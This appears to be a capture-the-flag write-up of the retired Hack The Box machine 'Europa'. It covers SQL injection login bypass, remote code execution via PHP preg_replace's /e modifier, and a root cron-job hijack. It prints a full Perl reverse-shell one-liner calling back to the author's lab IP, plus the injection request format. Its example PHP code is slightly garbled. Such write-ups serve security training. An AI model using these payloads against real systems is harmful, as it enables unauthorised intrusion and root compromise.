Europa machine on the hackthebox has retired. It was the linux VM whch can be considered as the beginner level box. Finding the user flag was “Not too Easy” but privilege escalation part was pretty much “Easy“.

Note: In order to keep all my CTF write ups crisp and concise, I only mention the steps which led to positive results. There were lot of trial and error and hours or in some case even days of failed attempts before reaching to the correct solution. For this challenge, IP address of my machine was 10.10.14.50 and europa was 10.10.10.22

Reconnaissance

I started with nmap to check for all open ports (-p-), version of services running (-sV) and perform script scans using default set of scripts (-sC)

nmap -sC -sV -p- 10.10.10.22 1 nmap - sC - sV - p - 10.10.10.22

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 22 / tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 ( Ubuntu Linux ; protocol 2.0 ) | ssh - hostkey : | 2048 6b : 55 : 42 : 0a : f7 : 06 : 8c : 67 : c0 : e2 : 5c : 05 : db : 09 : fb : 78 ( RSA ) | _ 256 b1 : ea : 5e : c4 : 1c : 0a : 96 : 9e : 93 : db : 1d : ad : 22 : 50 : 74 : 75 ( ECDSA ) 80 / tcp open http Apache httpd 2.4.18 ( ( Ubuntu ) ) | _http - server - header : Apache / 2.4.18 ( Ubuntu ) | _http - title : Apache2 Ubuntu Default Page : It works 443 / tcp open ssl / http Apache httpd 2.4.18 ( ( Ubuntu ) ) | _http - server - header : Apache / 2.4.18 ( Ubuntu ) | _http - title : Apache2 Ubuntu Default Page : It works | ssl - cert : Subject : commonName = europacorp . htb / organizationName = EuropaCorp Ltd . / stateOrProvinceName = Attica / countryName = GR | Subject Alternative Name : DNS : www . europacorp . htb , DNS : admin - portal . europacorp . htb | Not valid before : 2017 - 04 - 19T09 : 06 : 22 | _Not valid after : 2027 - 04 - 17T09 : 06 : 22 | _ssl - date : TLS randomness does not represent time Service Info : OS : Linux ; CPE : cpe : / o : linux : linux_kernel

Port 22, 80 and 443 was found to be open. There was DNS information stored in the SSL certificate. I modified the /etc/hosts file of my system to add the following entry. This allowed to navigate to the web application using the domain name.

10.10.10.22 admin-portal.europacorp.htb

Exploitation

On navigating to the above above URL, there was the login page. The login page was found to be vulnerable to SQL Injection. For the user name, I tried using admin@europacorp.htb and modified the request in burp.

It worked and I got redirected to the dashboard. Then I navigated to the tools.php page. The page was expecting the user to input the IP address. I entered a random IP and intercepted the request in burp.

There was the post request with 3 parameters : pattern, ipaddress and text. On observing the response from the web server, I figured out that tool.php is accepting a pattern /ip_address/ and modifies the content of test parameter with the user supplied input ipaddress. PHP version < 5.5.0 are vulnerable to Remote Code Execution due to the function preg_replace(). The regex modifier ‘i’ is used to replace the matched pattern with different string, but the modifier ‘e’ is very risky. It can be abused to execute arbitrary code. For e.g.

1 2 3 4 $ word = "you are safe" ; echo preg_replace ( / safe / i , "not save" ) ; #This will echo "you are not safe" echo preg_replace ( / safe / e , system ( 'echo you are hacked' ) ) ; #This will echo "you are hacked"







Remote Code Execution

The code execution can be acheived by sending the POST request in following format



pattern=/ip_address/e&ipaddress=COMMAND&text=ip_address



I created a listener using nc -nlvp 4444 on my local system to get the reverse shell. For some unknown reason, the reverse shell using nc kept dropping immediately after connection was established. Then I decided to move away from nc and upload a reverse shell script in python/perl. I modified the burp request to test if perl is installed on the victim.

Before the connection got closed, I received the confirmation that perl was installed 😀

Getting Reverse Shell

I downloaded the perl reverse shell script from pentestmonkey to my local system and modified the IP and Port parameter. I created the temporary web server (on port 8000 by default )to upload our shell using python -m SimpleHTTPServer. I opened the listener on port 5555 to get back the reverse shell. Then I modified the post request in burp to upload our reverse shell to the /tmp directory of the target machine and execute it.

And successfully got the shell !!!

Navigating to /home/john/ gave the user flag (user.txt)

Privilege Escalation

There was a cron job running with the root permission in the folder /var/www/cronjobs/

The cronjob was executing the shell script “logcleared.sh” with root permission. I created the following bash script with the name ‘logcleared.sh‘ at the location /var/www/cmd and made it executable using chmod +x logcleared.sh

#! /bin/bash perl -e 'use Socket;$i="10.10.14.50";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1 2 #! /bin/bash perl - e 'use Socket;$i="10.10.14.50";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

I created a listener on port 6666 on my local system. Next time the cron job ran, it executed the script and gave back the reverse shell with root permission. Now the root flag can be read from /root/root.txt

I hope this write-up was helpful. Share this if you found it useful. If you have any questions or suggestions please leave you comments. Subscribe to the mailing list to get updates for my future CTF write-ups and blogs.

Happy Learning 🙂